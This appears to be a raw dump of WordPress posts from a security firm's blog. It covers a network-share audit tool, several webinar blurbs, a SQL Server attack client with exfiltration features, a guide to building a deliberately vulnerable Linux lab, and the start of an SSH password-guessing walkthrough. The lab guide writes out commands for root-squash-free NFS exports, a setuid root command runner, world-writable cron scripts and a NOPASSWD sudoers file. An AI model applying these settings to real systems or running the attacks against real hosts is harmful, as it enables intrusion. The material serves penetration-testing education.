[*][03/01/2021 09:37] Scan Complete
--------------------------------------------------------------- 
SHARE ANALYSIS
--------------------------------------------------------------- 
[*][03/01/2021 09:37] Analysis Start
[*][03/01/2021 09:37] - 14 shares can be read across 12 systems.
[*][03/01/2021 09:37] - 1 shares can be written to across 1 systems.
[*][03/01/2021 09:37] - 46 shares are considered non-default across 32 systems.
[*][03/01/2021 09:37] - 0 shares are considered high risk across 0 systems
[*][03/01/2021 09:37] - Identified top 5 owners of excessive shares.
[*][03/01/2021 09:37] - Identified top 5 share groups.
[*][03/01/2021 09:37] - Identified top 5 share names.
[*][03/01/2021 09:37] - Identified shares created in last 90 days.
[*][03/01/2021 09:37] - Identified shares accessed in last 90 days.
[*][03/01/2021 09:37] - Identified shares modified in last 90 days.
[*][03/01/2021 09:37] Analysis Complete
--------------------------------------------------------------- 
SHARE REPORT SUMMARY
--------------------------------------------------------------- 
[*][03/01/2021 09:37] Domain: demo.local
[*][03/01/2021 09:37] Start time: 03/01/2021 09:35:04
[*][03/01/2021 09:37] End time: 03/01/2021 09:37:27
[*][03/01/2021 09:37] Run time: 00:02:23.2759086
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] COMPUTER SUMMARY
[*][03/01/2021 09:37] - 245 domain computers found.
[*][03/01/2021 09:37] - 55 (22.45%) domain computers responded to ping.
[*][03/01/2021 09:37] - 49 (20.00%) domain computers had TCP port 445 accessible.
[*][03/01/2021 09:37] - 32 (13.06%) domain computers had shares that were non-default.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares with potentially excessive privileges.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.41%) domain computers had shares that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) domain computers had shares that are HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE SUMMARY
[*][03/01/2021 09:37] - 217 shares were found. We expect a minimum of 98 shares
[*][03/01/2021 09:37]   because 49 systems had open ports and there are typically two default shares.
[*][03/01/2021 09:37] - 46 (21.20%) shares across 32 systems were non-default.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems are configured with 33 potentially excessive ACLs.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems allowed READ access.
[*][03/01/2021 09:37] - 1 (0.46%) shares across 1 systems allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) shares across 0 systems are considered HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE ACL SUMMARY
[*][03/01/2021 09:37] - 374 ACLs were found.
[*][03/01/2021 09:37] - 374 (100.00%) ACLs were associated with non-default shares.
[*][03/01/2021 09:37] - 33 (8.82%) ACLs were found to be potentially excessive.
[*][03/01/2021 09:37] - 32 (8.56%) ACLs were found that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.27%) ACLs were found that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) ACLs were found that are associated with HIGH RISK share names.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] - The 5 most common share names are:
[*][03/01/2021 09:37] - 9 of 14 (64.29%) discovered shares are associated with the top 5 share names.
[*][03/01/2021 09:37]   - 4 backup
[*][03/01/2021 09:37]   - 2 ssms
[*][03/01/2021 09:37]   - 1 test2
[*][03/01/2021 09:37]   - 1 test1
[*][03/01/2021 09:37]   - 1 users
[*] ----------------------------------------------- 

Analysis

PowerHuntShares will inventory SMB share ACLs configured with "excessive privileges" and highlight "high risk" ACLs. Below is how those are defined in this context.

Excessive Privileges 

Excessive read and write share permissions have been defined as any network share ACL containing an explicit ACE (Access Control Entry) for the "Everyone", "Authenticated Users", "BUILTIN\Users", "Domain Users", or "Domain Computers" groups. They all provide domain users access to the affected shares due to privilege inheritance issues.

High Risk Shares 

In the context of this report, high-risk shares have been defined as shares that provide unauthorized remote access to a system or application. By default, that includes wwwroot, inetpub, c, and c$ shares. However, additional exposures may exist that are not called out beyond that.

Reporting

The script will produce an HTML report, csv data files, and html files.

HTML Report 

The HTML report should have links to all the content. Below is a quick screenshot of the dashboard. It includes summary data at the computer, share, and share ACL level. It also has a fun share creation timeline so you can identify those share creation clusters mentioned earlier. It was my first attempt at generating that type of HTML/CSS with PowerShell, so while it could be better, at least it is a functional first try. 😊 It also includes data grouping summaries in the “data insights” section. 
 
Note: The data displayed in the creation timeline chart seems to be trustworthy, but the last accessed/modified timeline charts seem to be a little less dependable. I believe it has something to do with how they are used by the OS, but that is a research project for another day. 

A screenshot of the Powerhunt Shares dashboard. Includes summary data at the computer, share, and share ACL level.
CSV Files

The Invoke-HuntSMBShares script will generate all kinds of .csv files, but the primary file of interest will be the “Inventory-Excessive-Privileges.csv” file. It should contain all the data discussed earlier on in this blog and can be a good source of data for additional offline analysis.

A detailed screenshot of the Inventory-Excessive-Privileges.csv generated by the Invoke-HuntSMBShares script.A detailed screenshot of the Inventory-Excessive-Privileges.csv generated by the Invoke-HuntSMBShares script.

PowerShell can be used to import the .csv files and do additional analysis on the spot, which can be handy from both the blue and red team perspectives.

A screenshot detailing how PowerShell can be used to import.csv files for additional analysis.

Wrap Up

This was a fun blog to write, and we covered a lot of ground, so below is a quick recap:

  • IAM and red teams can leverage Active Directory to help create an inventory of systems, shares, and share permissions.
  • Remediation efforts can be expedited through simple data grouping techniques if the correct information is collected when creating your share inventory.
  • The builtin\users group implicitly includes domain users when joined to Active Directory domains through a group inheritance chain.
  • Shares configured with excessive permissions can lead to RCE in various ways.
  • Windows event IDs can be used to identify authenticated scanning (540, 4624, 680,4625) and share access (5140) happening in your environment.
  • PowerHuntShares is an open-source tool that can be used to get you started.

In the long term, my hope is to rewrite PowerHuntShares in C# to improve performance and remove some of the bugs. Hopefully, the information shared in this blog helped generate some awareness of the issues surrounding excessive permissions assigned to SMB shares in Active Directory environments. Or at least serves as a place to start digging into the solutions. 

Remember, share audits should be done on a regular cadence so you can identify and remediate high risk share permissions before they become a threat. It is part of good IT and offensive security hygiene, just like a penetration testing, adversary simulation, or red team operations

For more on this topic, watch NetSPI’s webinar, How to Evaluate Active Directory SMB Shares at Scale.

Good luck and happy hunting!

[post_title] => Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments [post_excerpt] => Learn how to quickly inventory, attack, and remediate network shares configured with excessive permissions assigned to SMB shares in Active Directory environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => network-share-permissions-powerhuntshares [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:24 [post_modified_gmt] => 2023-01-23 21:10:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28175 [menu_order] => 108 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 28131 [post_author] => 53 [post_date] => 2022-08-04 10:26:57 [post_date_gmt] => 2022-08-04 15:26:57 [post_content] =>
Watch Now

Vulnerability management programs often fail to identify excessive network share permissions, which can be a major security issue. Excessive share permissions have become a risk for data exposure, ransomware attacks, and privilege escalation within enterprise environments.

In this discussion, NetSPI's Vice President of Research Scott Sutherland will talk about why these security issues exist. He will explain how to identify and manage excessive access to common network shares within Active Directory environments.

Join the conversation to see Scott’s latest open source project PowerHuntShares in action and to learn:

  • Common reasons why shares permissions are configured with excessive privileges 
  • How to quickly inventory excessive share permissions across an entire Active Directory domain
  • How to efficiently triage those results to help reduce risk for your organization

[wonderplugin_video iframe="https://youtu.be/TtwyQchCz6E" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => How to evaluate Active Directory SMB shares at scale [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => evaluating-active-directory-smb-shares-at-scale [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:03:52 [post_modified_gmt] => 2022-11-11 18:03:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=28131 [menu_order] => 9 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 28035 [post_author] => 17 [post_date] => 2022-07-01 12:19:00 [post_date_gmt] => 2022-07-01 17:19:00 [post_content] =>

On July 1, 2022, NetSPI Senior Director Scott Sutherland was featured on Help Net Security where he discusses how, in order to stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. Read the summary below or watch the video online.

+++

  • Many vendors promote 100% coverage, but most EDRs and MSSP vendors only provide 20% of that coverage.
  • Companies that partner with MSSP vendors must view their contracts carefully to understand what malicious activities vendors cover.
  • Companies are overdependent on Indicators of Compromise (IOCs) – provided and available in the community – but these tools should be part of a larger program, not the end of the program.
  • Detection starts with a procedure like the popular MITRE Attack Framework.
  • Two challenges of building a behavior-based threat detection? Mapping technique coverages holistically and choosing which procedures to get coverage.
  • Review annual reports from threat detection companies to get a picture of the most common techniques and leverage your threat detection resources.
[post_title] => Help Net Security: The Challenges and Advantages of Building Behavior-based Threat Detection [post_excerpt] => NetSPI Senior Director Scott Sutherland was featured on Help Net Security where he discusses how, in order to stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => help-net-security-building-behavior-based-threat-detection [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:29 [post_modified_gmt] => 2023-01-23 21:10:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28035 [menu_order] => 119 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 25884 [post_author] => 53 [post_date] => 2021-07-12 15:36:48 [post_date_gmt] => 2021-07-12 20:36:48 [post_content] =>

Ransomware is a strategy for adversaries to make money – a strategy that’s proven successful. In this webinar, NetSPI’s Scott Sutherland and Alexander Polce Leary will cover how ransomware works, ransomware trends to watch, best practices for prevention, and more. At the core of the discussion, Scott and Alexander will explain how to build detections for common tactics, techniques, and procedures (TTPs) used by ransomware families and how to validate they work, ongoing, as part of the larger security program. Participants will leave this webinar with actionable advice to ensure their organization is more resilient to ever-evolving ransomware attacks.

[post_title] => How to Build and Validate Ransomware Attack Detections [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => build-validate-ransomware-attack-detections [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:14:33 [post_modified_gmt] => 2022-11-11 18:14:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=25884 [menu_order] => 28 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 19547 [post_author] => 53 [post_date] => 2020-08-04 11:37:01 [post_date_gmt] => 2020-08-04 16:37:01 [post_content] =>

Mainframes run the global economy and are at the heart of many of the world’s largest financial institutions. During this webinar, we will be interviewing our Mainframe security partner Chad Rikansrud from BMC. Chad will be discussing what mainframes are, how they can be a risk, and what companies can do to identify security holes before the bad guys do.

https://youtu.be/K0JNYXU-86w
[post_title] => Why zOS Mainframe Security Matters [post_excerpt] => Mainframes run the global economy and are at the heart of the many of the world’s largest financial organizations. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => why-zos-mainframe-security-matters [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:14:54 [post_modified_gmt] => 2022-11-11 18:14:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19547 [menu_order] => 56 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 19230 [post_author] => 53 [post_date] => 2020-06-02 13:49:41 [post_date_gmt] => 2020-06-02 13:49:41 [post_content] => Your employees were probably working from home more and more anyway, but the COVID-19 situation has taken work from home to a whole new level for many companies. Have you really considered all the security implications of moving to a remote workforce model? Chances are you and others are more focused on just making sure people can work effectively and are less focused on security. But at times of crisis – hackers are known to increase their efforts to take advantage of any weak links they can find in an organization’s infrastructure. Host-based security represents a large surface of attack that continues to grow as employees become increasingly mobile and work from home more often. Join our webinar to make sure your vulnerability management program is covering the right bases to help mitigate some of the implicit risks associated with a remote workforce. [post_title] => Host-Based Security: Staying Secure While Your Employees Work from Home [post_excerpt] => Watch this on-demand webinar to make sure you are vulnerability management program is covering the right bases to help mitigate some of the implicit risks associated with a remote workforce. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => host-based-security-staying-secure-while-your-employees-work-from-home-2 [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:15:10 [post_modified_gmt] => 2022-11-11 18:15:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19230 [menu_order] => 59 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 19772 [post_author] => 53 [post_date] => 2020-05-20 10:46:24 [post_date_gmt] => 2020-05-20 10:46:24 [post_content] =>

Watch the second webinar in our Lunch & Learn Series below!

Where there is Active Directory, there are SQL Servers. In dynamic enterprise environments, it’s common to see both platforms suffer from misconfigurations that lead to unauthorized system and sensitive data access. During this presentation, Scott covers common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. He also shares a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.

This presentation was originally developed for the Troopers20 conference, but due to the current travel constraints we’ll be sharing it online during this webinar.

https://youtu.be/Y0kD-xCZ3aI
[post_title] => SQL Server Hacking Tips for Active Directory Environments Webinar [post_excerpt] => During this presentation, NetSPI's Scott Sutherland covers common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => sql-server-hacking-tips-for-active-directory-environments-webinar [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:15:34 [post_modified_gmt] => 2022-11-11 18:15:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19772 [menu_order] => 63 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [19] => WP_Post Object ( [ID] => 11555 [post_author] => 17 [post_date] => 2020-05-04 07:00:04 [post_date_gmt] => 2020-05-04 07:00:04 [post_content] =>
Esc Logo

Evil SQL Client (ESC) is an interactive .NET SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.

This blog will provide a quick overview of the tool. For those who just want the code, it can be downloaded from https://github.com/NetSPI/ESC.

Why another SQL Server attack client?

PowerUpSQL and DAFT (A fantastic .net port of PowerUpSQL written by Alexander Leary) are great tool sets, but during red team engagements they can be a little too visible.  So to stay under the radar we initially we created a series of standalone .net functions that could be executed via alternative mediums like msbuild inline tasks.  Following that, we had a few clients request to exfiltrate data from the SQL Server using similar evasion techniques.  So we created the Evil SQL Client console to help make the testing process faster and the report screenshots easier to understand :) .

Summary of Executions Options

The Evil SQL Client console and functions can be run via:

  • Esc.exe  Esc.exe is the original application created in visual studio.
  • Esc.csproj is a msbuild script that loads .net code directly through inline tasks. This technique was researched and popularized by Casey Smith (@subTee).  There is a nice article on detection worth reading by Steve Cooper (@BleepSec)  here.
  • Esc.xml is also a msbuild script that uses inline tasks, but it loads the actual esc.exe assembly through reflection.  This technique was shared by @bohops in his GhostBuild project.  It also leverages work done by @mattifestation.
  • Esc-example.ps1 PowerShell script: Loads esc.exe through reflection.  This specific script was generated using Out-CompressDll by @mattifestation.

Below is a simple screenshot of the the Evil SQL Client console executed via esc.exe:

Start Esc Compile

Below is a simple screenshot of the the Evil SQL Client console being executed through MSBuild:

Esc Msbuild

Summary of Features/Commands

At the moment, ESC does not have full feature parity with the PowerUpSQL or DAFT, but the most useful bits are there. Below is a summary of the features that do exist.

DiscoveryAccessGatherEscalateExfil
Discover fileCheck accessSingle instance queryCheck loginaspwSet File
Discover domainspnCheck defaultpwMulti instance queryCheck uncinjectSet FilePath
Discover broadcastShow accessList serverinfoRun oscmdSet icmp
Show discoveredExport accessList databasesSet icmpip
Export discoveredList tablesSet http
List linksSet httpurl
List logins
List rolemembers
List privy*All query results are exfiltrated via all enabled methods.

For more information on available commands visit: https://github.com/NetSPI/ESC/blob/master/README.md#supportedcommands

Wrap Up

Hopefully, the Evil SQL Client console will prove useful on engagements and help illustrate the need for a larger time investment in detective control development surrounding MSBuild inline task execution, SQL Server attacks, and basic data exfiltration.   For more information regarding the Evil SQL Client (ESC), please visit the github project.

Below are some additional links to get you started on building detections for common malicious Msbuild and SQL Server use:

Good luck and hack responsibly!

[post_title] => Evil SQL Client Console: Msbuild All the Things [post_excerpt] => Evil SQL Client (ESC) is an interactive .net SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => evil-sql-client-console-msbuild-all-the-things [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:18 [post_modified_gmt] => 2021-06-08 22:00:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11555 [menu_order] => 384 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 18158 [post_author] => 53 [post_date] => 2020-04-07 10:18:04 [post_date_gmt] => 2020-04-07 15:18:04 [post_content] =>

During this webinar we’ll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence. Scott will also share a few PowerUpSQL functions that can be used to execute the CLR attacks on a larger scale in Active Directory environments.

https://youtu.be/A_hZHwisRxc
[post_title] => Attacking SQL Server CLR Assemblies [post_excerpt] => Watch this on-demand webinar on Attacking SQL Server CLR Assemblies with NetSPI’s Scott Sutherland. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-sql-server-clr-assemblies [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:16:09 [post_modified_gmt] => 2022-11-11 18:16:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=18158 [menu_order] => 66 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [21] => WP_Post Object ( [ID] => 11391 [post_author] => 17 [post_date] => 2020-03-27 07:00:57 [post_date_gmt] => 2020-03-27 07:00:57 [post_content] => This blog will share how to configure your own Linux server with the vulnerabilities shown in the "Linux Hacking Case Studies" blog series. That way you can practice building and breaking at home. Similar to the rest of the series, this blog is really intended for people who are new to penetration testing, but hopefully there is a little something for everyone. Enjoy! Below are links to the first four blogs in the series: Below is an overview of what will be covered in this blog:

Lab Scenarios

This section briefly summarizes the lab scenarios that you'll be building which are based on this blog series.
# REMOTE VULNERABILITY LOCAL VULNERABILITY ESCALATION PATH
1 Excessive privileges configured on a Rsync Server Excessive privileges configured on a Rsync server.  Specifically, the server is configured to run as root. Create a new privileged user by adding lines to the shadow, passwd, groups, and sudoers files.
2 Excessive privileges configured on a NFS Export  Insecure setuid binary that allows arbitrary code execution as root. Review setuid binaries and determine which ones have the direct or indirect capability to execute arbitrary code as root.
3 Weak password configured for phpMyAdmin Excessive privileges configured on a script that is executed by a root cron job.  Specifically, the script file is world writable. Write a command to the world writable script that starts a netcat listener.  When the root cron job executes the script the netcat listener will start as root. Then its possible to connect to the netcat listeners remotely to obtain root access. Reverse shell alternatives here.
4 Weak password configured for SSH Insecure sudoers configurations that allows arbitrary code execution as root through sudo applications. Review sudo applications to determine which ones have the direct or indirect capability to execute arbitrary code as root. Examples include sh, VI, python, netcat, and the use of a custom nmap module.

Kali VM and Install Dependencies

For this lab, we'll be building our vulnerable services on a standard Kali image.  If you don't already have a Kali VM, you can download from their site website to get you setup.  Once your Kali VM is ready to go you'll want to install some package that will be required for setting up the scenarios in the lab.  Make sure to sign as root, you'll need those privilege to setup the lab. Install Required Packages
apt-get update
apt-get install nfs-kernel-server
apt-get install nfs-common
apt-get install ufw
apt-get install nmap
Clear Firewall Restrictions
iptables --flush
ufw allow from any to any
ufw status
With that out of the way let's dive in.

Lab Setup: Rsync

Attack Lab: Linux Hacking Case Study Part 1: Rsync In this section we'll cover how to configure an insecure Rsync server.  Once you're logged in as root execute the commands below. Let's start by creating the rsyncd.conf configuration file with the commands below:
echo "motd file = /etc/rsyncd.motd" > /etc/rsyncd.conf
echo "lock file = /var/run/rsync.lock" >> /etc/rsyncd.conf
echo "log file = /var/log/rsyncd.log" >> /etc/rsyncd.conf
echo "pid file = /var/run/rsyncd.pid" >> /etc/rsyncd.conf
echo " " >> /etc/rsyncd.conf
echo "[files]" >> /etc/rsyncd.conf
echo " path = /" >> /etc/rsyncd.conf
echo " comment = Remote file share." >> /etc/rsyncd.conf
echo " uid = 0" >> /etc/rsyncd.conf
echo " gid = 0" >> /etc/rsyncd.conf
echo " read only = no" >> /etc/rsyncd.conf
echo " list = yes" >> /etc/rsyncd.conf
Rsync Next, let's setup the rsync Service:
systemctl enable rsync
systemctl start rsync
or
systemctl restart rsync
Verify the Configuration
rsync 127.0.0.1::
rsync 127.0.0.1::files
Rsync

Lab Setup: NFS

Attack Lab: Linux Hacking Case Study Part 2: NFS In this section we cover how to configure insecure NFS exports and an insecure setuid binary.  Once you're logged in as root execute the commands below.

Configure NFS Exports

Create NFS Exports
echo "/home *(rw,sync,no_root_squash)" >> /etc/exports
echo "/ *(rw,sync,no_root_squash)" >> /etc/exports
Start NFS Server
systemctl start nfs-kernel-server.service
systemctl restart nfs-kernel-server
Verify NFS Export
showmount -e 127.0.0.1
Nfs Create Password Files for Discovery
echo "user2:test" > /root/user2.txt
echo "test:password" > /tmp/creds.txt
echo "test:test" > /tmp/mypassword.txt
Nfs Enable password authentication through SSH.
sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config
service ssh restart

Create Insecure Setuid Binary

Create the source code for a binary that can execute arbitrary OS commands called exec.c:
echo "#include <stdlib.h>" > /home/test/exec.c
echo "#include <stdio.h>" >> /home/test/exec.c
echo "#include <unistd.h>" >> /home/test/exec.c
echo "#include <string.h>" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo "int main(int argc, char *argv[]){" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo " printf("%s,%dn", "USER ID:",getuid());" >> /home/test/exec.c
echo " printf("%s,%dn", "EXEC ID:",geteuid());" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo " printf("Enter OS command:");" >> /home/test/exec.c
echo " char line[100];" >> /home/test/exec.c
echo " fgets(line,sizeof(line),stdin);" >> /home/test/exec.c
echo " line[strlen(line) - 1] = ''; " >> /home/test/exec.c
echo " char * s = line;" >> /home/test/exec.c
echo " char * command[5];" >> /home/test/exec.c
echo " int i = 0;" >> /home/test/exec.c
echo " while(s){" >> /home/test/exec.c
echo " command[i] = strsep(&s," ");" >> /home/test/exec.c
echo " i++;" >> /home/test/exec.c
echo " }" >> /home/test/exec.c
echo " command[i] = NULL;" >> /home/test/exec.c
echo " execvp(command[0],command);" >> /home/test/exec.c
echo "}" >> /home/test/exec.c
Compile exec.c:
gcc -o /home/test/exec exec.c
rm exec.c
Configure setuid on exec so that we can execute commands as root:
chmod 4755 exec
Nfs Verify you can execute the exec binary as a least privilege user. Nfs

Lab Setup: phpMyAdmin

Attack Lab: Linux Hacking Case Study Part 3: phpMyAdmin In this section we'll cover how to configure an insecure instance of phpMyAdmin, a root cron job, and a script that's world writable.  Once you're logged in as root execute the commands below.

Reset the root Password (this is mostly for existing MySQL instances)

We'll start by resetting the root password on the local MySQL instance.  MySQL should be installed by default in Kali, but if it's not on your build you'll have to install it first.
# Stop mysql
/etc/init.d/mysql stop

# Start MySQL in safe mode and log in as root
mysqld_safe --skip-grant-tables&
mysql -uroot

# Select the database to use
use mysql;

# Reset the root password
update user set password=PASSWORD("password") where User='root';
flush privileges;
quit

# Restart the server
/etc/init.d/mysql stop
/etc/init.d/mysql start

# Confirm update by logging in with new password
mysql -u root -p
exit

Install PHPMyAdmin

Alrighty, time to install phpMyAdmin.
apt-get install phpmyadmin
Eventually you will be presented with a GUI. Follow the instructions below.
  1. Choose apache2 for the web server. Warning: When the first prompt appears, apache2 is highlighted, but not selected. If you do not hit Space to select Apache, the installer will not move the necessary files during installation. Hit Space, Tab, and then Enter to select Apache.
  2. Select yes when asked whether to use dbconfig-common to set up the database.
  3. You will be prompted for your database administrator's password, which should be set to "password" to match the lab.
After the installation we still have a few things to do. Let's create a soft link in the webroot to phpmyadmin.
ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin
Then, let's restart the required services:
service apache2 restart
service mysql restart
Next, let's add the admin user we'll be guessing later.
mysql -u root
use mysql;
CREATE USER 'admin'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'admin'@'%' WITH GRANT OPTION;
exit
Finally, configure excessive privileges in the webroot just for fun:
cd /var/www/
chown -R www-data *
chmod -R 777 *
Web it's all done you should be able to verify the setup by logging into https://127.0.0.1/phymyadmin as the "admin" user with a password of "password". Php

Create a World Writable Script

Next up, let's make a world writable script that will be executed by a cron job.
mkdir /scripts
echo "echo hello world" >> /scripts/rootcron.sh
chmod -R 777 /scripts
Create Root Cron Job Now, let's configure a root cron job to execute the script every minute.
echo "* * * * * /scripts/rootcron.sh" > mycron
You can then verify the cron job was added with the command below.
crontab -l
Cron

Lab Setup: Sudoers

Attack Lab: Linux Hacking Case Study Part 4: Sudoers Horror Stories This section outlines how to create a sudoers configuration that allows the execution of applications that can run arbitrary commands. Create Encrypted Password The command below will allow you create create an encrypted password for generating test users. I originally found this guidance from https://askubuntu.com/questions/94060/run-adduser-non-interactively.
openssl passwd -crypt test
Next you can add new users using the generate password below.  This is not required, but handy for scripting out environments.
useradd -m -p O1Fug755UcscQ -s /bin/bash test
useradd -m -p O1Fug755UcscQ -s /bin/bash user1
useradd -m -p O1Fug755UcscQ -s /bin/bash user2
useradd -m -p O1Fug755UcscQ -s /bin/bash user3
useradd -m -p O1Fug755UcscQ -s /bin/bash tempuser
Create an Insecure Sudoers Configuration The sudoers configuration below with allow vi, nmap, python, and sh to be executed as root by test and user1.
echo "Cmnd_Alias ALLOWED_CMDS = /usr/bin/vi, /usr/bin/nmap, /usr/bin/python3.6, /usr/bin/python3.7, /usr/bin/sh" > /etc/sudoers
echo "test ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
echo "user1 ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
When its all done you can log in as the previously created test user to verify the sudo application are available: Sudo

Wrap Up

In this blog we covered how to configure your own vulnerable Linux server, so you can learn in a safe environment.  Hopefully the Linux Hacking Case Studies blog series was useful for those of you who are new the security community.  Stay safe and hack responsibly! [post_title] => Linux Hacking Case Studies Part 5: Building a Vulnerable Linux Server [post_excerpt] => This blog will share how to configure your own vulnerable Linux server so you can practice building and breaking at home. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-5-building-a-vulnerable-linux-server [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:59:23 [post_modified_gmt] => 2021-06-08 21:59:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11391 [menu_order] => 397 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 11375 [post_author] => 17 [post_date] => 2020-03-26 07:00:16 [post_date_gmt] => 2020-03-26 07:00:16 [post_content] =>

This blog will cover different ways to approach SSH password guessing and attacking sudo applications to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking weak passwords and sudo applications can be applied to many real world environments. This should be a fun walk through for people new to penetration testing.

This is the fourth of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during network penetration tests.

Below are links to the first three blogs in the series:

Below is an overview of what will be covered in this blog:

Finding SSH Servers

Before we can start password guessing or attacking sudo applications, we need to find some SSH servers to go after.  Luckily Nmap and similar port scanning tools make that pretty easy because most vendors still run SSH on the default port of 22.

Below is a sample Nmap command and screenshot to get you started.

nmap -sS -sV -p22 192.168.1.0/24 -oA sshscan

Once you’ve run the port scan you can quickly parse the results to make a file containing a list of SSH servers to target. Below is a command example and quick video to help illustrate.

grep -i "open" sshscan.gnmap
grep -i "open" sshscan.gnmap | awk -F ' ' '{print $2} '> ssh.txt
cat ssh.txt

Dictionary Attacks against SSH Servers

Password guessing is a pretty basic way to gain initial access to a Linux system, but that doesn’t mean it’s not effective.  We see default and weak SSH passwords configured in at least a half of the environments we look at.

If you haven't done it before, below are a few tips to get you started.

  1. Perform additional scanning and fingerprinting against the target SSH server and try to determine if it’s a specific device. For example, determine if it is a known printer, switch, router, or other miscellaneous network device. In many cases, knowing that little piece of information can lead you to default device passwords and land you on the box.
  2. Based on the service fingerprinting, also try to determine if any applications are running on the system that create local user accounts that might be configured with default passwords.
  3. Lastly, try common username and password combinations. Please be careful with this approach if you don’t understand the account lockout policies though.  No one wants to have a bad day. 😊

Password Lists

